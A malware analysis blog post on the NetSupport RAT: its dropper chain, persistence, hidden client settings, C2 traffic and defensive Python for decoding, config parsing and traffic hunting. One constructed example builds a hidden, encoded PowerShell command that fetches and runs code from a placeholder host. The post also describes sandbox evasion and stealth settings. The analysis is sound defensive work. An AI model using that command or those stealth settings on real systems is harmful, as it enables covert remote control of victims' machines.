Into the Rat’s Nest: A SenseOn Analysis of the NetSupport RAT
Threat actors prefer to deploy tools that look genuine and expected in a business IT environment, since this camouflages their toolset within an organisation's application portfolio. NetSupport Manager, a remote access tool, has been used by system administrators since its release in 1989 and by threat actors since at least 2016. The tool is similar to AnyDesk or TeamViewer, applications used by admins and IT help desk personnel to remotely access devices for maintenance. These technologies have been, and continue to be, abused by attackers in the form of remote access trojans (RATs). This blog post examines the NetSupport RAT specifically: its history, a static and dynamic analysis of the RAT itself, and indicators of compromise (IOCs).
Background
The NetSupport RAT has been observed in campaigns throughout 2023, including those examined by Trellix and Carbon Black. In the latter half of 2023 the RAT was primarily distributed through fake Google Chrome update downloads. Attackers have also been observed injecting redirection code (or the malware itself) into legitimate, compromised websites so that the downloads appear trusted. This reduces the chance of the malware-hosting site being blocked and increases the probability of a successful infection.
Attribution of a NetSupport RAT infection is typically difficult, as the simplicity and ease of use of the tool mean that a wide range of attackers employ it in their attacks.
This blog will take a look at a sample of the NetSupport RAT discovered in December of 2022, provided by ‘malware-traffic-analysis.net’. In this instance, the initial attack vector was a phishing email masquerading as an email from USPS detailing a package shipment.
Static Analysis
To break down the NetSupport RAT, we can first statically examine and dissect the malware into its three primary components: the initial JavaScript dropper, the PowerShell script it retrieves, and the NetSupport client executable with its attacker-supplied configuration. The initial JavaScript file is rather lightweight and simple once deobfuscated.
JavaScript Dropper
In all, the malicious JavaScript file, named ‘5645_M.js’, is 641 lines of highly obfuscated JavaScript. Below is a small section of the code.
The script relies on numerous wrapper functions and string arrays for obfuscation, in an attempt to evade detection and slow down analysis. Using popular JavaScript deobfuscation tools such as deobfuscate.io and deobfuscate relative, we can reduce the code to 56 lines and identify the primary payload, which is executed using the JavaScript below.
Using CyberChef we can further deobfuscate the command by replacing the ‘<’ characters with ‘%’ and applying the URL Decode operation, which returns the raw script. Below is the cleaned-up version of the command, with comments removed, variables given meaningful names and the string concatenations applied.
This reveals a Base64-encoded PowerShell command. Note that PowerShell's -EncodedCommand argument carries the Base64 of the script's UTF-16LE bytes, so the blob must be decoded as UTF-16LE rather than as ASCII. It decodes to the following PowerShell command, used to retrieve the malicious ‘index.php’ file.
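The two decoding layers described above (undo the ‘<’ for ‘%’ substitution and URL-decode, then Base64-decode the -EncodedCommand blob as UTF-16LE) can be scripted so the same chain applies to any sample of this dropper. The following is an added example written for this post, not code from the original analysis or from SenseOn. The obfuscated input is constructed inside the script: the PowerShell it hides is benign and the host (example.invalid) is a placeholder, not the sample's real command.

```python
import base64
import re
from urllib.parse import unquote

# Constructed stand-in for the dropper's obfuscated command string. It is NOT the
# real sample: the PowerShell inside is benign and the URL is a placeholder
# (example.invalid). It is built the way the dropper hides its payload:
# percent-encode every character, then swap '%' for '<'.
def build_constructed_sample() -> str:
    script = "(New-Object Net.WebClient).DownloadString('http://example.invalid/index.php') | IEX"
    # -enc takes the Base64 of the script's UTF-16LE bytes, not its ASCII bytes
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    command = f"powershell.exe -w hidden -enc {encoded}"
    percent_encoded = "".join(f"%{ord(ch):02X}" for ch in command)
    return percent_encoded.replace("%", "<")


def undo_url_layer(obfuscated: str) -> str:
    """Reverse the '<' for '%' substitution, then URL-decode (CyberChef's URL Decode)."""
    return unquote(obfuscated.replace("<", "%"))


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENCODED_ARG = re.compile(r"-(?:enc[a-z]*|e|ec|en)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line: str) -> str:
    """Extract the -EncodedCommand blob and decode it as UTF-16LE."""
    match = ENCODED_ARG.search(command_line)
    if match is None:
        raise ValueError("no -EncodedCommand argument found")
    raw = base64.b64decode(match.group(1))
    return raw.decode("utf-16-le")


def deobfuscate(obfuscated: str) -> dict:
    """Run both layers and return the intermediate command line and the final script."""
    command_line = undo_url_layer(obfuscated)
    return {"command_line": command_line, "script": decode_encoded_command(command_line)}


if __name__ == "__main__":
    result = deobfuscate(build_constructed_sample())
    print(result["command_line"][:60] + "...")
    print(result["script"])
```

Decoding the blob as UTF-8 instead of UTF-16LE yields text interleaved with NUL bytes, which is the usual sign that the wrong encoding was chosen.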
PowerShell Script
The next stage is the execution of a PowerShell script masquerading as a PHP file named ‘index.php’. This script is 262 lines of obfuscated PowerShell, relying largely on string concatenation, arrays and variables, but it is far more readable than the JavaScript. Below is a portion of the script.
After deobfuscation, we can see the script essentially achieves the following:
Checks the path of the script for indicators of analysis, such as the strings ‘sandbox’, ‘analysis’ and ‘malware’.
Installs NetSupport into a randomly named directory under ‘AppData\’; the paths and file names are declared earlier in the script.
Creates a registry Run key named ‘Software Updater’ for persistence.
Runs the NetSupport client executable, renamed ‘presentationhost.exe’.
NetSupport Manager
The primary program ‘presentationhost.exe’ and its components are heavily flagged on VirusTotal. Examining the program and its configuration files reveals the C2 configuration, seen below within the ‘client32.ini’ configuration file.
The same file also carries numerous client settings chosen to hide the client from the victim user.
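Since the C2 configuration and the stealth settings both live in client32.ini (this holds for the 2024 sample discussed later as well), a small parser turns the file into hunting material: gateway hosts for DNS and proxy searches, and the list of settings that suppress the client's visible traces. The following is an added example for this post, not SenseOn's tooling. The client32.ini fragment is constructed, and the section and key names it uses (GatewayAddress, SecondaryGateway, GSK, Port, silent, SysTray, HideWhenIdle, DisableChat, DisableDisconnect) and their meanings are assumptions about the NetSupport configuration format rather than values taken from the sample.

```python
import configparser

# Constructed client32.ini fragment, not the sample's file. The section and key
# names are assumptions about the NetSupport client configuration format; hosts
# and the GSK value are placeholders.
SAMPLE_CLIENT32_INI = """\
[Client]
_present=1
silent=1
SysTray=0
HideWhenIdle=1
DisableChat=1
DisableDisconnect=1
Usernames=*

[HTTP]
CMPI=60
GatewayAddress=c2.example.invalid:2145
GSK=EXAMPLEKEY
Port=2145
SecondaryGateway=backup.example.invalid:443
"""

# Key/value pairs that suppress the client's user-visible traces (assumed semantics).
STEALTH_SETTINGS = {
    "silent": "1",             # no connect/disconnect prompts
    "SysTray": "0",            # no tray icon
    "HideWhenIdle": "1",       # client window hidden when not in use
    "DisableChat": "1",        # nothing can pop up on the victim's screen
    "DisableDisconnect": "1",  # victim cannot end the session
}


def parse_gateway(value: str):
    """Split 'host:port' into (host, port); port is None if absent or not numeric."""
    host, sep, port = value.rpartition(":")
    if not sep:
        return value, None
    return host, int(port) if port.isdigit() else None


def parse_client32(text: str) -> dict:
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case so names match the file verbatim
    cp.read_string(text)

    gateways = []
    if cp.has_section("HTTP"):
        for key in ("GatewayAddress", "SecondaryGateway"):
            value = cp["HTTP"].get(key)
            if value:
                gateways.append((key,) + parse_gateway(value))

    stealth = []
    if cp.has_section("Client"):
        stealth = [k for k, v in STEALTH_SETTINGS.items() if cp["Client"].get(k) == v]

    return {
        "gateways": gateways,
        "gsk": cp.get("HTTP", "GSK", fallback=None),
        "stealth": stealth,
    }


def network_iocs(parsed: dict) -> set:
    """Hosts to search for in DNS and proxy telemetry."""
    return {host for _, host, _ in parsed["gateways"]}


if __name__ == "__main__":
    parsed = parse_client32(SAMPLE_CLIENT32_INI)
    print("gateways:", parsed["gateways"])
    print("stealth settings:", parsed["stealth"])
    print("hunt for:", sorted(network_iocs(parsed)))
```

The interesting signal for triage is the combination: a legitimate NetSupport client is not suspicious on its own, but one configured to be silent, tray-less and hidden while pointing at a gateway outside the organisation is.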
Dynamic Analysis
Because initial access varies between campaigns, we started from the JavaScript file itself, which was originally delivered inside a zip archive hosted at a URL (lbbyqrluzu.cracknight[.]ru) linked from the phishing email. To observe the RAT in action and SenseOn’s detection capabilities against it, we executed the malicious JavaScript file in a sandbox environment for dynamic analysis. The SenseOn endpoint agent immediately detected the malicious JavaScript file being executed by WScript.
Following its execution, the WScript process spawns PowerShell with the encoded command we decoded during static analysis.
The command decodes to the plaintext in Figure 5, creating a WebClient object to retrieve and execute ‘index.php’.
DNS telemetry shows that retrieving the payload failed because the malicious domain name no longer resolved.
In an earlier analysis of the RAT this DNS query succeeded, and the connection to the domain generated the SenseOn observation below.
Fortunately, the PowerShell script file ‘index.php’ is provided in the artefacts from ‘malware-traffic-analysis.net’.
After executing it, we can see a suspicious directory, ‘X4YaToyF’, created under ‘AppData\Roaming’. This is the location of the NetSupport installation; below we can see the primary executable, DLLs and configuration files.
We can also view the persistence mechanism within the Windows registry, innocuously named ‘SoftwareUpdater’, which executes ‘presentationhost.exe’.
Immediately after execution, SenseOn detected the suspicious program ‘presentationhost.exe’ (the renamed NetSupport client) being launched from PowerShell.
As a result of these suspicious processes, SenseOn raised a high-priority case correlating multiple observations detected on the infected device.
Upon execution of ‘presentationhost.exe’, the program makes an HTTP request to ‘geo.netsupportsoftware.com’ to retrieve the victim's geolocation. This is NetSupport's own infrastructure rather than attacker-controlled, so on its own it indicates only that a NetSupport client is running; it becomes meaningful when paired with the other observations here.
Following this, we can see attempts and failures to resolve the C2 domain ‘npinmclaugh11[.]com’; ‘npinmclaugh14[.]com’, however, resolves successfully.
Once the DNS request succeeded, a connection was established to the server, triggering the suspicious-network-connection detection seen below.
Two HTTP requests were then sent to the malicious domain over the non-standard port 2145, both answered with ‘200 OK’. Because the traffic is plain HTTP, the request URI is visible and shows which resource was retrieved: ‘fakeurl.htm’.
In the ‘request form data’ fields of these requests we see the following values, decoded from Base64-encoded text. The first HTTP request decodes to the plaintext below.
The second HTTP request decodes to the following, with an encrypted DATA field.
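The observations above (a geolocation lookup to NetSupport's own host, plaintext HTTP to ‘fakeurl.htm’ on a non-standard port, Base64 form data whose first message is plaintext and whose second carries an encrypted DATA field) can be turned into detection logic over proxy or HTTP telemetry. The following is an added example for this post, not SenseOn's detection content. The log lines are constructed rather than real telemetry, the C2 host is a placeholder, and the CMD=/INFO=/ACK=/DATA= field names are an assumption about the gateway protocol; the post only states that the first body decodes to plaintext and the second contains an encrypted DATA field.

```python
import base64
import binascii
from urllib.parse import urlsplit

NETSUPPORT_GEO_HOST = "geo.netsupportsoftware.com"  # legitimate NetSupport host
GATEWAY_URI = "/fakeurl.htm"                         # request URI observed in the analysis


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed log lines, not real telemetry: "<method> <url> <status> <base64 body or ->".
# The C2 host is a placeholder; the CMD=/INFO=/ACK=/DATA= field names are an
# assumption about the gateway protocol.
SAMPLE_LOG = [
    "GET http://geo.netsupportsoftware.com/ 200 -",
    "POST http://c2.example.invalid:2145/fakeurl.htm 200 " + _b64("CMD=POLL\nINFO=1\nACK=1\n"),
    "POST http://c2.example.invalid:2145/fakeurl.htm 200 " + _b64("CMD=ENCD\nDATA=3a9f0c77e1\n"),
    "GET http://intranet.example.invalid/index.html 200 -",
]


def decode_form_data(blob: str):
    """Base64-decode a request body; None if absent or not valid Base64."""
    if blob == "-":
        return None
    try:
        return base64.b64decode(blob, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def analyse_request(line: str) -> dict:
    method, url, status, body = line.split(" ", 3)
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    reasons = []
    if parts.hostname == NETSUPPORT_GEO_HOST:
        reasons.append("NetSupport geolocation lookup (legitimate host, shows a client is running)")
    if parts.path.endswith(GATEWAY_URI):
        reasons.append("NetSupport gateway URI")
    if parts.scheme == "http" and port not in (80, 8080):
        reasons.append(f"plaintext HTTP on non-standard port {port}")
    fields = {}
    decoded = decode_form_data(body)
    if decoded:
        # Gateway messages are newline-separated KEY=VALUE pairs once Base64 is removed
        fields = dict(kv.split("=", 1) for kv in decoded.splitlines() if "=" in kv)
        if "CMD" in fields:
            reasons.append(f"gateway command {fields['CMD']}")
        if fields.get("CMD") == "ENCD":
            reasons.append("encrypted DATA payload follows")
    return {"method": method, "host": parts.hostname, "port": port, "status": status,
            "reasons": reasons, "fields": fields}


def hunt(lines) -> list:
    """Return only the requests that matched at least one indicator."""
    return [r for r in (analyse_request(l) for l in lines) if r["reasons"]]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["method"], hit["host"], hit["port"], "->", "; ".join(hit["reasons"]))
```

The geolocation lookup is deliberately reported with a lower-confidence reason: it fires for legitimate NetSupport deployments too, so a rule should raise a case only when it co-occurs with the gateway URI, the non-standard port or the CMD= body within a short window.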
This analysis of the NetSupport RAT is consistent with the most recent samples, such as the one analysed below, taken from MalwareBazaar and first seen on January 9th, 2024 (SHA-256 fef8bdf50c19a012bfdc9da3f4ea4cab39075637ca527f24af79575007b2befe).
As shown above, the C2 configuration is still held in the ‘client32.ini’ configuration file. Upon execution of the ‘client32.exe’ executable, the RAT makes nearly identical HTTP requests to ‘geo.netsupportsoftware[.]com’ and to the C2 server specified in the configuration file.
Below we can see the C2 server responding with 400 Bad Request; the request_form_data field is again a Base64-encoded string identical to the one sent by the first sample.
This is where our dynamic analysis ends. From this analysis we identified and detected multiple techniques used by the RAT, covering execution, defence evasion, persistence and C2 communications.
IoCs
Files/hashes
Domains/IPs